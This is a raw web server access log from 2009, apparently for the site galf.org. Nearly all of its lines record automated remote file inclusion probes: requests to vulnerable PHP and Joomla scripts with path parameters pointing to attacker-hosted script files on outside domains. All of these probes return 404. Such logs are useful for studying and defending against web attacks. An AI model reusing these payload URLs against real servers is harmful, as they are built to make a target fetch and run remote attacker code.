70.38.31.183 - - [22/Nov/2009:20:53:34 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:53:34 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:53:34 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:53:34 -0800] "GET /logs/access_090525.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:53:34 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:53:34 -0800] "GET /logs/access_090525.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:20:54:32 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:20:54:32 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:20:54:32 -0800] "GET /logs/access_090810.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:20:54:33 -0800] "GET /logs/access_090330.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.111.29 - - [22/Nov/2009:20:55:07 -0800] "GET /?N=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:20:56:44 -0800] "GET /logs/access_091102.log///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:19 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:19 -0800] "GET /logs/access_090810.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:19 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:19 -0800] "GET /logs/access_090810.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:19 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:19 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:21 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:21 -0800] "GET /logs/access_090810.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:21 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:24 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:24 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:25 -0800] "GET /logs/access_090330.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:25 -0800] "GET /logs/access_090330.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:27 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:27 -0800] "GET /logs/access_090330.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:41 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:41 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:57:45 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:20:58:56 -0800] "GET /com_mp3_allopass/allopass.php?mosConfig_live_site=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.47.71.89 - - [22/Nov/2009:20:58:56 -0800] "GET /logs//com_mp3_allopass/allopass.php?mosConfig_live_site=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.47.71.89 - - [22/Nov/2009:20:58:56 -0800] "GET /logs/access.log%20%20//com_mp3_allopass/allopass.php?mosConfig_live_site=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.47.71.89 - - [22/Nov/2009:20:58:59 -0800] "GET /com_mp3_allopass/allopass.php?mosConfig_live_site=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.47.71.89 - - [22/Nov/2009:20:58:59 -0800] "GET /logs//com_mp3_allopass/allopass.php?mosConfig_live_site=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.47.71.89 - - [22/Nov/2009:20:58:59 -0800] "GET /logs/access.log%20%20//com_mp3_allopass/allopass.php?mosConfig_live_site=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
70.38.31.183 - - [22/Nov/2009:20:59:15 -0800] "GET /logs/access_090921.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:59:15 -0800] "GET /logs/access_090921.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:21:00:34 -0800] "GET /logs//com_mp3_allopass/allopass.php?mosConfig_live_site=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:21:00:34 -0800] "GET /logs/access_090525.log//com_mp3_allopass/allopass.php?mosConfig_live_site=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:21:00:34 -0800] "GET /com_mp3_allopass/allopass.php?mosConfig_live_site=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [22/Nov/2009:21:00:41 -0800] "GET /arcade.php?phpbb_root_path=http://www.mysecl.com///test002/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
92.50.143.90 - - [22/Nov/2009:21:00:41 -0800] "GET /logs//arcade.php?phpbb_root_path=http://www.mysecl.com///test002/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:21:01:15 -0800] "GET /logs/access_090629.log//com_mp3_allopass/allopass.php?mosConfig_live_site=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [22/Nov/2009:21:03:18 -0800] "GET /logs//arcade.php?phpbb_root_path=http://www.mysecl.com///test002/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "galf.org"
92.50.143.90 - - [22/Nov/2009:21:03:18 -0800] "GET /arcade.php?phpbb_root_path=http://www.mysecl.com///test002/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "galf.org"
92.50.143.90 - - [22/Nov/2009:21:04:17 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.mysecl.com///test002/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
92.50.143.90 - - [22/Nov/2009:21:04:17 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.mysecl.com///test002/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:21:07:08 -0800] "GET /logs/access.log//com_mp3_allopass/allopass.php?mosConfig_live_site=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:21:07:08 -0800] "GET /logs//com_mp3_allopass/allopass.php?mosConfig_live_site=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:21:07:08 -0800] "GET /com_mp3_allopass/allopass.php?mosConfig_live_site=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:21:07:19 -0800] "GET /com_mp3_allopass/allopass.php?mosConfig_live_site=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:21:07:19 -0800] "GET /logs/access.log//com_mp3_allopass/allopass.php?mosConfig_live_site=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:21:07:19 -0800] "GET /logs//com_mp3_allopass/allopass.php?mosConfig_live_site=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:21:07:49 -0800] "GET /logs/access_091102.log///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:21:12:43 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:21:12:43 -0800] "GET /logs/access_091102.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:21:12:43 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:21:12:53 -0800] "GET /logs/access.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.129.64.89 - - [22/Nov/2009:21:12:53 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.129.64.89 - - [22/Nov/2009:21:12:53 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
198.65.57.134 - - [22/Nov/2009:21:13:48 -0800] "GET /logs/access_090504.log/modify.php?dir_module=http://www.lastuacoe.it/id3.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.50" "www.galf.org"
198.65.57.134 - - [22/Nov/2009:21:13:48 -0800] "GET /logs/access_091102.log/modify.php?dir_module=http://www.lastuacoe.it/id3.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.50" "www.galf.org"
198.65.57.134 - - [22/Nov/2009:21:13:49 -0800] "GET /modify.php?dir_module=http://www.lastuacoe.it/id3.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.50" "www.galf.org"
198.65.57.134 - - [22/Nov/2009:21:13:49 -0800] "GET /logs/modify.php?dir_module=http://www.lastuacoe.it/id3.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.50" "www.galf.org"
194.8.75.145 - - [22/Nov/2009:21:18:12 -0800] "GET /logs/access.log HTTP/1.0" 200 139591 "http://www.galf.org/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:21:19:56 -0800] "GET /logs/access_090921.log%20%20///index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:21:19:56 -0800] "GET //index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:21:19:57 -0800] "GET /logs///index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:21:20:00 -0800] "GET /logs/access_090921.log%20%20///index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:21:20:00 -0800] "GET //index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:21:20:00 -0800] "GET /logs///index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.181.217 - - [22/Nov/2009:21:20:24 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.181.217 - - [22/Nov/2009:21:20:24 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.181.217 - - [22/Nov/2009:21:20:24 -0800] "GET /logs/access_090713.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:21:21:14 -0800] "GET /logs/access_091102.log%20%20///index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:21:21:20 -0800] "GET /logs//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:21:21:20 -0800] "GET /logs/access_090810.log//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:21:21:20 -0800] "GET /components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [22/Nov/2009:21:21:24 -0800] "GET /common/db.php?commonpath=http://www.mysecl.com///test002/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
92.50.143.90 - - [22/Nov/2009:21:21:24 -0800] "GET /logs//common/db.php?commonpath=http://www.mysecl.com///test002/test.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:21:21:25 -0800] "GET /logs/access_091102.log%20%20///index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:21:22:01 -0800] "GET /components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:21:22:02 -0800] "GET /logs//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:21:22:02 -0800] "GET /logs/access_090810.log//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
198.65.57.134 - - [22/Nov/2009:21:22:38 -0800] "GET /logs/access_090504.log%20/modify.php?dir_module=http://www.lastuacoe.it/id3.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.50" "www.galf.org"
198.65.57.134 - - [22/Nov/2009:21:22:49 -0800] "GET /logs/access_091102.log%20/modify.php?dir_module=http://www.lastuacoe.it/id3.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.50" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:21:27:49 -0800] "GET /logs/access_090713.log%20%20//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:21:28:05 -0800] "GET /logs/access_090518.log%20%20//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:21:29:20 -0800] "GET /logs/access_090713.log%20%20//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:21:29:32 -0800] "GET /logs/access_090518.log%20%20//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:21:35:57 -0800] "GET /logs/access_091102.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:21:37:08 -0800] "GET /com_mp3_allopass/allopass.php?mosConfig_live_site=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.63.60.50 - - [22/Nov/2009:21:37:08 -0800] "GET /logs//com_mp3_allopass/allopass.php?mosConfig_live_site=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.63.60.50 - - [22/Nov/2009:21:37:09 -0800] "GET /logs/access.log%20%20//com_mp3_allopass/allopass.php?mosConfig_live_site=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.100.181.217 - - [22/Nov/2009:21:38:53 -0800] "GET /logs/access_090921.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:21:38:59 -0800] "GET /logs/access.log//com_mp3_allopass/allopass.php?mosConfig_live_site=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.129.64.89 - - [22/Nov/2009:21:39:02 -0800] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:39:35 -0800] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:39:35 -0800] "GET /logs/access_090713.log%20%20//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:39:35 -0800] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:39:35 -0800] "GET /logs/access_090713.log%20%20//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:39:35 -0800] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:39:35 -0800] "GET /logs/access_090713.log%20%20//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:39:36 -0800] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:39:36 -0800] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:39:36 -0800] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:39:56 -0800] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:39:57 -0800] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
